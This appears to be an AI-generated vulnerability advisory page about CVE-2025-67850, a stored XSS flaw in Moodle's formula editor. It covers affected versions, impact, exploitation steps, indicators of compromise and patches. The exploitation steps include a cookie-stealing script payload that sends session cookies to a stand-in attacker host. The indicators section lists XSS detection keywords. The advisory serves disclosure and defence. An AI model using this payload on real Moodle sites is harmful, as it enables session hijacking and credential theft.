CVE-2025-67850: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-67850 is a stored Cross-Site Scripting (XSS) vulnerability in Moodle's formula editor that allows remote attackers to inject malicious scripts into arithmetic expression fields. When other users view these expressions, the injected code executes in their browsers, potentially compromising data or enabling unauthorized actions. The vulnerability was reported on December 19, 2025, and publicly disclosed on February 3, 2026. Affected versions include Moodle < 4.1.22, >= 4.4.0 and < 4.4.12, >= 4.5.0 and < 4.5.8, >= 5.0.0 and < 5.0.4, and >= 5.1.0 and < 5.1.1. The CVSS v3.1 base score is 7.3 (High) per the GitHub Advisory, or 6.1 (Medium) per NVD (Github Advisory, Red Hat Bugzilla).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically insufficient input filtering in the formula editor's arithmetic expression fields (CWE-79). An attacker with at least low-level privileges can craft a malicious payload and submit it via the formula editor; when another user views the expression, the script executes in their browser context. The attack vector is network-based, requires low privileges to inject, and requires user interaction (a victim viewing the expression) to trigger. A patch commit is publicly referenced at moodle/moodle@c85f153 (Github Advisory, Red Hat Bugzilla).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who view the malicious formula expressions, leading to session hijacking, credential theft, unauthorized actions on behalf of victims, or further phishing attacks within the Moodle platform. The CVSS assessment indicates high confidentiality and integrity impact (per the GitHub Advisory scoring), meaning sensitive user data could be accessed or modified. Availability is not directly impacted, but the compromise of user sessions could have cascading effects on the integrity of course content and user data (Github Advisory).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-67850 as of the available data. The EPSS score is approximately 0.041% (0.000410), placing it in the 2nd percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify a vulnerable Moodle instance running a version prior to the patched releases (< 4.1.22, < 4.4.12, < 4.5.8, < 5.0.4, or < 5.1.1) and confirm access to the formula editor feature.
  2. Authentication: Log in with a low-privileged account (e.g., a student or teacher account) that has access to create or edit quiz questions or activities using the formula editor.
  3. Inject malicious payload: In the formula editor's arithmetic expression field, insert an XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent encoded variant that bypasses any partial filters.
  4. Persist the payload: Save the formula or expression so it is stored in the Moodle database and rendered to other users who view the associated quiz, activity, or course content.
  5. Trigger execution: When a victim user (e.g., another student, teacher, or administrator) views the page containing the malicious expression, the injected script executes in their browser, potentially stealing session cookies or performing actions on their behalf (Github Advisory, Red Hat Bugzilla).

Indicators of compromise

  • Logs: Moodle web server access logs showing unusual POST requests to formula editor endpoints (e.g., /question/type/calculated/ or similar quiz/formula editor paths) containing HTML tags or JavaScript keywords (<script>, onerror, javascript:) in request bodies.
  • Logs: Moodle application logs recording unexpected script-like content saved in formula expression fields by low-privileged users.
  • Network: Outbound HTTP requests from victim browsers to external attacker-controlled domains shortly after viewing Moodle formula content, potentially carrying session cookie data as query parameters.
  • File System: No direct file system artifacts expected for a stored XSS; however, database records in Moodle's question or formula tables containing embedded HTML/JavaScript should be treated as suspicious.

Mitigation and workarounds

Moodle has released patched versions that address this vulnerability: 4.1.22, 4.4.12, 4.5.8, 5.0.4, and 5.1.1. Administrators should upgrade to the appropriate patched version as soon as possible. No specific configuration-based workaround has been published; restricting access to the formula editor to trusted users only may reduce exposure until patching is feasible (Github Advisory, Red Hat Bugzilla).

Community reactions

The vulnerability was reported via Red Hat's Bugzilla by the OSIDB Bzimport process on December 19, 2025, and assigned high severity by Red Hat's Product Security team. The Moodle project acknowledged the issue in their community forum. No significant broader media coverage or notable researcher commentary beyond standard vulnerability database entries has been identified (Red Hat Bugzilla, Moodle Forum).

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Ubuntu

Unknown

bionic (esm-apps)

moodle

Unknown

xenial (esm-apps-legacy)

moodle

Unknown

Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management